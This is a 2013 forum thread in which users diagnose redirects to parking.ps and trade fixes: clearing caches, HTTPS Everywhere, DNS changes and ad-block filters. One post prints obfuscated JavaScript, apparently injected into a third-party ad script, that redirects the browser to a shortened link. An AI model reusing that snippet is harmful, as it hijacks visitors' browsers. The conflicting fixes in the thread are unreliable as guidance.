ThaidDown Posted September 6, 2013 Share Posted September 6, 2013 Could also run a superb utility which finds BHO's called HIJACKTHIS you do need a level of tech understanding as its output isn't that easy to read. To make the output of HijackThis a little easier to understand paste the output log into http://www.hijackthis.de/index.php?langselect=english ,they will analyse it against their database and return results that will give a better understanding. Link to comment Share on other sites More sharing options...
GrantSmith Posted September 7, 2013 Share Posted September 7, 2013 Seeing as though this was affecting my iOS devices (iPad and iPhone) but not my laptop, I've reverted back to using the app on both iOS devices. This parking redirect BS is getting worse, prior today the simple work - but still tremendously annoying - around was to click the URL bar which seemed to stop the redirect and left you on the TVF page you were viewing. Now, doing this, stops the redirect on the parking redirect and you then have to hit back to get back to the TVF page. #firstworldproblemsandallthatjazz Link to comment Share on other sites More sharing options...
mjj Posted September 7, 2013 Share Posted September 7, 2013 Grant, have you tried my suggestion? 24 hours without any problem. Link to comment Share on other sites More sharing options...
rayongchelsea Posted September 7, 2013 Share Posted September 7, 2013 I just changed my search engine on my iPad from google no problems since. Link to comment Share on other sites More sharing options...
davejonesbkk Posted September 7, 2013 Author Share Posted September 7, 2013 that 'always https' plugin for Chrome seems to be doing the job ok for me so far. For those of you scanning your computer etc with malware programs and looking at the processes you wont find anything as it looks like this is happening in the connection and external to computers Link to comment Share on other sites More sharing options...
Maestro Posted September 7, 2013 Share Posted September 7, 2013 At first I thought parking.ps was affecting only PCs and iMacs but now I read that hand-held devices running on Android and iOS also get infected. For such hand-held device, would the easiest solution be to do a so-called factory reset? Link to comment Share on other sites More sharing options...
Para Posted September 7, 2013 Share Posted September 7, 2013 @davejonesbkk for it to be s 'connection problem' would IMO mean it was DNS related something that is certainly possibly but difficult to achieve. @maestro been reading about the massive increase in mobile OS attacks and the shift of focus of hackers to them due to general ignorance of security people have towards them. Samsung are releasing KNOX to try and combat this trend and its just another reason not to root a device.... Link to comment Share on other sites More sharing options...
Dutchiebangkok Posted September 7, 2013 Share Posted September 7, 2013 I'm also experiencing this ***ing parking.ps redirecting problem. In fact, while typing this post it has happened 4 or 5 times. Thai Visa what is going on? It has been happening on other websites too since Thursday but on Thaivisa.com it happens every minute!! It only happens on my iPhone and iPad. Link to comment Share on other sites More sharing options...
SecretAgentMan Posted September 7, 2013 Share Posted September 7, 2013 I'm also experiencing this ***ing parking.ps redirecting problem. In fact, while typing this post it has happened 4 or 5 times. Thai Visa what is going on? It has been happening on other websites too since Thursday but on Thaivisa.com it happens every minute!! It only happens on my iPhone and iPad. Delete history and cookies. It worked for me. Link to comment Share on other sites More sharing options...
chuckygobyebye Posted September 7, 2013 Share Posted September 7, 2013 Hi Guys, This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop. What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure. The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere). We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server. Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache. The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur. Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked. 2 Link to comment Share on other sites More sharing options...
kotsak Posted September 8, 2013 Share Posted September 8, 2013 The owner of the parking.ps domain explains here what may have happened... https://discussions.apple.com/message/22912367#22912367 Link to comment Share on other sites More sharing options...
yankee99 Posted September 8, 2013 Share Posted September 8, 2013 Hi Guys, This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop. What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure. The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere). We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server. Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache. The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur. Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked. rubbish. my galaxy note was redirecting in pattaya, tokyo and miami. My ipad was doing it in all the same locations. My desktop only in pattaya. Link to comment Share on other sites More sharing options...
Phil Conners Posted September 8, 2013 Share Posted September 8, 2013 I think this comes from True's proxy server and is easily removed by Malwarebytes. I've never heard of cleanpcguide.com before and would stay well clear of them, migth easily make matters much worse. Link to comment Share on other sites More sharing options...
chuckygobyebye Posted September 8, 2013 Share Posted September 8, 2013 Hi Guys, This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop. What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure. The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere). We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server. Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache. The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur. Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked. rubbish. my galaxy note was redirecting in pattaya, tokyo and miami. My ipad was doing it in all the same locations. My desktop only in pattaya. You're getting cache hits. Link to comment Share on other sites More sharing options...
muratremix Posted September 8, 2013 Share Posted September 8, 2013 The owner of the parking.ps domain explains here what may have happened... https://discussions.apple.com/message/22912367#22912367 So he is getting free hits but he doesn't like the way his domain searched on google. If he was sincere, atleast he could disable redirects for people from India and Thailand. I'd say somebody is after quick money and True is too slow to fix things. Link to comment Share on other sites More sharing options...
yankee99 Posted September 8, 2013 Share Posted September 8, 2013 I think this comes from True's proxy server and is easily removed by Malwarebytes.I've never heard of cleanpcguide.com before and would stay well clear of them, migth easily make matters much worse. The owner of the parking.ps domain explains here what may have happened... https://discussions.apple.com/message/22912367#22912367 So he is getting free hits but he doesn't like the way his domain searched on google. If he was sincere, atleast he could disable redirects for people from India and Thailand. I'd say somebody is after quick money and True is too slow to fix things. I dont think it has anything to do with true as Narita airport isp does the same thing,,, Link to comment Share on other sites More sharing options...
yankee99 Posted September 8, 2013 Share Posted September 8, 2013 Hi Guys, This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop. What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure. The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere). We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server. Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache. The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur. Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked. rubbish.my galaxy note was redirecting in pattaya, tokyo and miami. My ipad was doing it in all the same locations. My desktop only in pattaya. You're getting cache hits. I will clear my cache on all devices and see what happens. Link to comment Share on other sites More sharing options...
kkerry Posted September 8, 2013 Share Posted September 8, 2013 In Chrome settings under Privacy you can elect to 'Enable phishing and malware protection' Would this be the solution after clearing your cache? I'm on True and have yet to see this parking redirect problem. Link to comment Share on other sites More sharing options...
easyride Posted September 8, 2013 Share Posted September 8, 2013 I find that this add-on for Firefox works. It gives a small warning by the task bar when it blocks a page. https://addons.mozilla.org/en-us/firefox/addon/blocksite/ It slows the browser down a bit but I can at least read a newspaper page without being re-directed half a dozen times. Can't find anything for IE that blocks without putting up another page that says it blocked a page. Link to comment Share on other sites More sharing options...
aalek85th Posted September 8, 2013 Share Posted September 8, 2013 There's a javascript file being loaded that is being modified by a 3rd party somehow. The file name is quant.js. It's loading from: http://edge.quantserve.com/quant.js The offending code looks like: //<![CDATA[ if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72]; setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz)); } function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); } //]]> The hex part is redirecting to http://goo.gl/4QR3H2' which is parking.ps. If u try to open edge.quantserve.com/quant.js and get this code, hit ctrl+r it will reload and download a original file, clearing cache should also help. Since it is not happening on all sites, I think it's coming from some broken ad server or quantserve.com dns got poisoned somehow and changed to some malicious IP which had the modified version of quant.js. So it was redirecting when u visit sites that used quant.js from this server. 1 Link to comment Share on other sites More sharing options...
RedCardinal Posted September 9, 2013 Share Posted September 9, 2013 Thank you, Para. The information in the link you posted looks like the best advice so far in this topic about how to remove the parking.ps redirect. Fortunately, my laptop is not infected but I checked the msconfig just the same to make sure. In Windows 7 it is as follows: Click on Start In the search field, type msconfig, then press Enter Click on Startup in the headings row Click on header Startup Item to sort the list alphabetically Scroll down the list to see if there is Parking.ps in the column Startup Item Luckily, I haven't got it, nothing starting with P. System Configuraion Startup.png There is no parking.ps malware. The malware is actually the fake tools being offered to "remove" it. They will infect your machine with all sorts of junk. The redirect is being caused by JS file that is loading from ISP. This file does not install any malware. If you're seeing the redirect do not install any tool that offers to remove parking.ps malware. Link to comment Share on other sites More sharing options...
Chicog Posted September 9, 2013 Share Posted September 9, 2013 Everything I've seen points to this as a browser hijack. Certainly if you are getting this in IE you could try resetting it: http://support.microsoft.com/kb/923737 Link to comment Share on other sites More sharing options...
beb Posted October 5, 2013 Share Posted October 5, 2013 woke up this morning to these forex redirects. Going through this and another similar thread, I see a lot of contradictory fixes. has anybody come up with a definitive fix yet? I have adblock, https everywhere etc. installed and have cleared my cache as suggested. I haven't done certain things because others have said they are either ineffective or could be damaging. Thanks! Link to comment Share on other sites More sharing options...
nellyp Posted October 5, 2013 Share Posted October 5, 2013 My problem started with compare.com hijacking bbc sport. I installed adblocker and that stopped thast page. Then another site strated taking over bbc I cleared cahches and installed HTTPS everywhere. I have no idea what HTTPS everywhere is doing but the counter it has has gone up to 4 in 10 mins. My problem is happening on 2 laptops that I use in 2 different locations, with different providers. Very annoying. Link to comment Share on other sites More sharing options...
Scarecrow Posted October 6, 2013 Share Posted October 6, 2013 Here's what I posted over in the forex thread. I added these custom filters to Adblock Plus. Other ad blocking extensions might use a different syntax. ||chartbeat.com^ ||quantserve.com^ ||scorecardresearch.com^ Those seemed to do the trick for me. It's possible that Ghostery, a privacy oriented extension, might also work since it blocks some of these same scripts by default. I haven't tried this. As for HTTPS Everywhere, it simply attempts to make your browser connect to sites via https (encrypted) instead of http (unencrypted). I'm not sure that'll help with this particular problem, but it's worthwhile to have anyway. Lastly, to reiterate some of what's been said before, these recent redirects are most likely the result of bad third-party scripts on the some of the sites you visit. This is why something as simple as an ad blocker can work; you can tell it to stop those scripts from loading. I hope this has helped. Link to comment Share on other sites More sharing options...
beb Posted October 6, 2013 Share Posted October 6, 2013 well, it stopped as quickly as it started. I haven't had it happen in 24 hours and can't really say it's because of anything I did. I did add the filters to ad block as suggested just in case. Thanks Link to comment Share on other sites More sharing options...
kennypowers Posted October 9, 2013 Share Posted October 9, 2013 This is pretty much exactly the same as the forex redirect virus I have. Like others have said this seems to be an issue with TRUE ISP, and the more I look into it the more it seems they are covering up the problem rather than fixing it. See here for more info and fixes: http://www.thethailandlife.com/thai-internet-forex-redirect-virus Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now